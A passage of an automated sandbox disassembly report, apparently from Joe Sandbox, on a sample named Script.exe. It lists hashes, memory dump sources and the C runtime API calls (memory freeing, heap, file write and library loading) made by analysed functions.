                                                                                    • Opcode Fuzzy Hash: 9ceae4855dbdb8447090e5a448d543eb439c8690a93fc83ffaefa46ea59212ad
                                                                                    • Instruction Fuzzy Hash: D3712937F56AA44787188D3C4C112B9AA570BD7330B3EC776AEB5EB3E5C6698D014390
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2685aa5aa7cd8aa33164e031343d12cb5af2dd2c43503b9e9ceac282da2ec8c8
                                                                                    • Instruction ID: f680c1e479aee098d536219933e76c8309757d4e9b13f7a659e98eb10f2aac5c
                                                                                    • Opcode Fuzzy Hash: 2685aa5aa7cd8aa33164e031343d12cb5af2dd2c43503b9e9ceac282da2ec8c8
                                                                                    • Instruction Fuzzy Hash: 24617C3560C3D15FC7268F29C884A2E7BE1AF96310F48C2ADE8E44B392D671DD05C792
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d77ddeb152d7e8874b0a4fea5b7f6f8d5db53cc1797da7e9bec149dbec24a2c
                                                                                    • Instruction ID: 6e33fc826ae0a33548d767e7c3e68eb5cc07bc84d044b5df2f7d7949a21a31be
                                                                                    • Opcode Fuzzy Hash: 1d77ddeb152d7e8874b0a4fea5b7f6f8d5db53cc1797da7e9bec149dbec24a2c
                                                                                    • Instruction Fuzzy Hash: 1251373760D6D14BD32A8B3D4C213A96B9B4BD6334F2C8B7EE5B28B3E1D9594C058301
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                    • Instruction ID: c4a48939f8ece878de1515e4c4b820f740a9794359856bb41c64a0098f638834
                                                                                    • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                    • Instruction Fuzzy Hash: 3C01263BA413028B8324CF5CC0D06ABB3B4FF95790B1A845ED5411F370DB319D258221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                    • Instruction ID: 084a32fb0cb9d86da45d1dd4c961bcee84f89d35af91df41b1a7f5b217586c7b
                                                                                    • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                    • Instruction Fuzzy Hash: 2FE08CB2911228EBCB11CBC8C904A8EF3ECFB44E54B1108A6FA06D3200C270DE01C7C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f00d29758c8e88557259673db34bf3bfce6f3f27a36d7300623395b6402989e2
                                                                                    • Instruction ID: 5c950f05b2b2f21b3378778f8d20e2a62b79f73e811c4bc58e2fdcd9ca92839d
                                                                                    • Opcode Fuzzy Hash: f00d29758c8e88557259673db34bf3bfce6f3f27a36d7300623395b6402989e2
                                                                                    • Instruction Fuzzy Hash: 6ED0A728A146456F9918B739ADCBD37BE3C8347204F002134AD42E7385D800D818C2EE

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1949 6e0c6b78-6e0c6b8c 1950 6e0c6b8e-6e0c6b93 1949->1950 1951 6e0c6bfa-6e0c6c02 1949->1951 1950->1951 1954 6e0c6b95-6e0c6b9a 1950->1954 1952 6e0c6c49-6e0c6c61 call 6e0c6ce9 1951->1952 1953 6e0c6c04-6e0c6c07 1951->1953 1961 6e0c6c64-6e0c6c6b 1952->1961 1953->1952 1955 6e0c6c09-6e0c6c46 call 6e0c4493 * 4 1953->1955 1954->1951 1957 6e0c6b9c-6e0c6b9f 1954->1957 1955->1952 1957->1951 1959 6e0c6ba1-6e0c6ba9 1957->1959 1962 6e0c6bab-6e0c6bae 1959->1962 1963 6e0c6bc3-6e0c6bcb 1959->1963 1965 6e0c6c6d-6e0c6c71 1961->1965 1966 6e0c6c8a-6e0c6c8e 1961->1966 1962->1963 1967 6e0c6bb0-6e0c6bc2 call 6e0c4493 call 6e0c8aa7 1962->1967 1968 6e0c6bcd-6e0c6bd0 1963->1968 1969 6e0c6be5-6e0c6bf9 call 6e0c4493 * 2 1963->1969 1971 6e0c6c87 1965->1971 1972 6e0c6c73-6e0c6c76 1965->1972 1976 6e0c6ca6-6e0c6cb2 1966->1976 1977 6e0c6c90-6e0c6c95 1966->1977 1967->1963 1968->1969 1974 6e0c6bd2-6e0c6be4 call 6e0c4493 call 6e0c8ba5 1968->1974 1969->1951 1971->1966 1972->1971 1981 6e0c6c78-6e0c6c86 call 6e0c4493 * 2 1972->1981 1974->1969 1976->1961 1980 6e0c6cb4-6e0c6cbf call 6e0c4493 1976->1980 1985 6e0c6c97-6e0c6c9a 1977->1985 1986 6e0c6ca3 1977->1986 1981->1971 1985->1986 1993 6e0c6c9c-6e0c6ca2 call 6e0c4493 1985->1993 1986->1976 1993->1986
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E0C6BBC
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AC4
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AD6
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AE8
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AFA
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B0C
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B1E
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B30
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B42
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B54
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B66
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B78
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B8A
                                                                                      • Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B9C
                                                                                    • _free.LIBCMT ref: 6E0C6BB1
                                                                                      • Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
                                                                                      • Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB
                                                                                    • _free.LIBCMT ref: 6E0C6BD3
                                                                                    • _free.LIBCMT ref: 6E0C6BE8
                                                                                    • _free.LIBCMT ref: 6E0C6BF3
                                                                                    • _free.LIBCMT ref: 6E0C6C15
                                                                                    • _free.LIBCMT ref: 6E0C6C28
                                                                                    • _free.LIBCMT ref: 6E0C6C36
                                                                                    • _free.LIBCMT ref: 6E0C6C41
                                                                                    • _free.LIBCMT ref: 6E0C6C79
                                                                                    • _free.LIBCMT ref: 6E0C6C80
                                                                                    • _free.LIBCMT ref: 6E0C6C9D
                                                                                    • _free.LIBCMT ref: 6E0C6CB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 6022a2863d8e01a106007be0c5e00d9693f3d36bbdd0d6810fd7bb05232d41bb
                                                                                    • Instruction ID: 9fd57ecce7e35183c1efc5d9bace8c15e638c33871fa20f039457eb214a275bc
                                                                                    • Opcode Fuzzy Hash: 6022a2863d8e01a106007be0c5e00d9693f3d36bbdd0d6810fd7bb05232d41bb
                                                                                    • Instruction Fuzzy Hash: D2319231514701AFEB608AF8E840BAE73EEFF05F54F208829E169D7154DF31E9819722

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2207 6e0c3d53-6e0c3d66 2208 6e0c3d68-6e0c3d71 call 6e0c4493 2207->2208 2209 6e0c3d72-6e0c3e1f call 6e0c4493 * 9 call 6e0c3b7f call 6e0c3bea 2207->2209 2208->2209
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: c727e4924d92f25ee70ffe3f214b33c6e3da6418a0dd7244a7ad5a76e5a75e74
                                                                                    • Instruction ID: e8fc9b5b5eac8f37166cd7665ca8d1564b1069e70e78803cc26ea534979b5b76
                                                                                    • Opcode Fuzzy Hash: c727e4924d92f25ee70ffe3f214b33c6e3da6418a0dd7244a7ad5a76e5a75e74
                                                                                    • Instruction Fuzzy Hash: 17210576900108BFCB01DFE4D880EDE7BBEFF19644F1488A6E6059B120EB71EA45DB81
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6E0C2367
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E0C236F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6E0C23F8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E0C2423
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6E0C2478
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: a8acafefd57008402f1055db454f4706abc6927eb12b62668bd2a52ede3ef1d8
                                                                                    • Instruction ID: d65417fbfad210c5d09bf3e94dd17c1b1fdf88c8a2215b7c6835e787545f1b91
                                                                                    • Opcode Fuzzy Hash: a8acafefd57008402f1055db454f4706abc6927eb12b62668bd2a52ede3ef1d8
                                                                                    • Instruction Fuzzy Hash: 3B41B234A00619EFCF00DFE8C884B9EBBB5EF45B28F109555E914AB751CB319A46CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 0-537541572
                                                                                    • Opcode ID: 9eef1cc0dfc17c16e69de1fd54d503d563d910da90ee9a30901a57864158ec14
                                                                                    • Instruction ID: 585ce71f9033a622b1f859d1e8ec9369f1081a57a02155b1c83927cd8039d504
                                                                                    • Opcode Fuzzy Hash: 9eef1cc0dfc17c16e69de1fd54d503d563d910da90ee9a30901a57864158ec14
                                                                                    • Instruction Fuzzy Hash: 0C21BB3E945611EFDB1186E6CCC5B4E37A8AF06FE4F252550E915AF290D770DD00C5E2
                                                                                    APIs
                                                                                      • Part of subcall function 6E0C8C0E: _free.LIBCMT ref: 6E0C8C33
                                                                                    • _free.LIBCMT ref: 6E0C8C94
                                                                                      • Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
                                                                                      • Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB
                                                                                    • _free.LIBCMT ref: 6E0C8C9F
                                                                                    • _free.LIBCMT ref: 6E0C8CAA
                                                                                    • _free.LIBCMT ref: 6E0C8CFE
                                                                                    • _free.LIBCMT ref: 6E0C8D09
                                                                                    • _free.LIBCMT ref: 6E0C8D14
                                                                                    • _free.LIBCMT ref: 6E0C8D1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                    • Instruction ID: 81f15b676e7867f2104af762fd3b0bf026dbee426d016c24577e65e02c8d4ca6
                                                                                    • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                    • Instruction Fuzzy Hash: 85116A71581B04FAD620ABF0CC85FCF779EBF05B44F404C25A299A7050DB34F50597A2
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E0C7DA7
                                                                                    • __fassign.LIBCMT ref: 6E0C7F8C
                                                                                    • __fassign.LIBCMT ref: 6E0C7FA9
                                                                                    • WriteFile.KERNEL32(?,6E0C6543,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0C7FF1
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E0C8031
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0C80D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                    • String ID:
                                                                                    • API String ID: 1735259414-0
                                                                                    • Opcode ID: 4386426ef435cfdc1701bcbe2a572e8dc20a6d58fe08d5cfe3c9777360fd9385
                                                                                    • Instruction ID: 4f3e22fed94d85b140e966911536f36863e3e48529eba98974e35283b13d731c
                                                                                    • Opcode Fuzzy Hash: 4386426ef435cfdc1701bcbe2a572e8dc20a6d58fe08d5cfe3c9777360fd9385
                                                                                    • Instruction Fuzzy Hash: ADC19F75D042598FDB10CFE8C880AEDFBB5FF09714F28816AE865B7281D631A946CF61
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,?,6E0C24D5,6E0C1600,6E0C1019,?,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120,0000000C,6E0C134A), ref: 6E0C2815
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E0C2823
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E0C283C
                                                                                    • SetLastError.KERNEL32(00000000,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120,0000000C,6E0C134A,?,00000001,?), ref: 6E0C288E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: a577ff7d154b9e9270f4b7fa5f92d6371df8bdf69d681317100504e2f4731ea6
                                                                                    • Instruction ID: 9621592213d30fc32952a08a332edd0e21405572efa55da1e18142416f1e3b94
                                                                                    • Opcode Fuzzy Hash: a577ff7d154b9e9270f4b7fa5f92d6371df8bdf69d681317100504e2f4731ea6
                                                                                    • Instruction Fuzzy Hash: 9701D83221FF135E9A542DF59C95B8E2A9EDB06FB87201729F52057CE0EF724815A242
                                                                                    Strings
                                                                                    • C:\Users\user\Desktop\Script.exe, xrefs: 6E0C4D04
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C:\Users\user\Desktop\Script.exe
                                                                                    • API String ID: 0-3474726233
                                                                                    • Opcode ID: f0cf780684a2400db5b22a3b2db744b4b6b52d3420659cdfcc6ee253574ab232
                                                                                    • Instruction ID: 1cd30a9e25ce243e8bd698d9f52e7a360d024bf65956676c0bd016b1878efd06
                                                                                    • Opcode Fuzzy Hash: f0cf780684a2400db5b22a3b2db744b4b6b52d3420659cdfcc6ee253574ab232
                                                                                    • Instruction Fuzzy Hash: B8218E71604205BF9B10AFF59CC0F9E77ADFE01BAC7108A14F9A497594EB30DC528BA2
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E0C2A44,00000000,?,00000001,00000000,?,6E0C2ABB,00000001,FlsFree,6E0CCD3C,FlsFree,00000000), ref: 6E0C2A13
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: d6cd51a1957a721a22ab43f04198a7922a8cf9b455c840eae0bbdbd536df22b8
                                                                                    • Instruction ID: 26b46fb3d63559e76b25dc20a82210a1413021a59c28e1fbf82a79e996b096c4
                                                                                    • Opcode Fuzzy Hash: d6cd51a1957a721a22ab43f04198a7922a8cf9b455c840eae0bbdbd536df22b8
                                                                                    • Instruction Fuzzy Hash: 9211CA32A41E229BDB618AE8CC8474D37E4AF06FB0F251611E911FB6C4D770E900C6D3
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E0C2FEC,?,?,6E0C2FB4,?,00000001,?), ref: 6E0C304F
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E0C3062
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E0C2FEC,?,?,6E0C2FB4,?,00000001,?), ref: 6E0C3085
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: c0694528d7ef132193062e77a4c2666951f0256baec232d8e82ef5c7098edf39
                                                                                    • Instruction ID: e7a2a87b252fe8d373f1919a124d3f474978f5c1d3be5da6815385fd55ea9bc1
                                                                                    • Opcode Fuzzy Hash: c0694528d7ef132193062e77a4c2666951f0256baec232d8e82ef5c7098edf39
                                                                                    • Instruction Fuzzy Hash: 88F0A732900519FBDF119BD1CC6DB9E7FB9EB06F55F200060F404AA150CB348E00DB92
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 6E0C76DB
                                                                                    • __alloca_probe_16.LIBCMT ref: 6E0C77A1
                                                                                    • __freea.LIBCMT ref: 6E0C780D
                                                                                      • Part of subcall function 6E0C680C: HeapAlloc.KERNEL32(00000000,6E0C6543,6E0C6543,?,6E0C5243,00000220,?,6E0C6543,?,?,?,?,6E0C8661,00000001,?,?), ref: 6E0C683E
                                                                                    • __freea.LIBCMT ref: 6E0C7816
                                                                                    • __freea.LIBCMT ref: 6E0C7839
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: 1d54eaf6a8e1381d27e549b386f1eb41cf1b9d50e4807573ea55571423da3c92
                                                                                    • Instruction ID: a0617d5c71b851a56b34590ea7171de94efb168f4edb353e01b0041f075c21f1
                                                                                    • Opcode Fuzzy Hash: 1d54eaf6a8e1381d27e549b386f1eb41cf1b9d50e4807573ea55571423da3c92
                                                                                    • Instruction Fuzzy Hash: A651A07255020BAFEB114EF4CC40FAF36A9EB45F94F294628F914A7190E730DC55C7A2
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 6E0C8BBD
                                                                                      • Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
                                                                                      • Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB
                                                                                    • _free.LIBCMT ref: 6E0C8BCF
                                                                                    • _free.LIBCMT ref: 6E0C8BE1
                                                                                    • _free.LIBCMT ref: 6E0C8BF3
                                                                                    • _free.LIBCMT ref: 6E0C8C05
                                                                                    Memory Dump Source
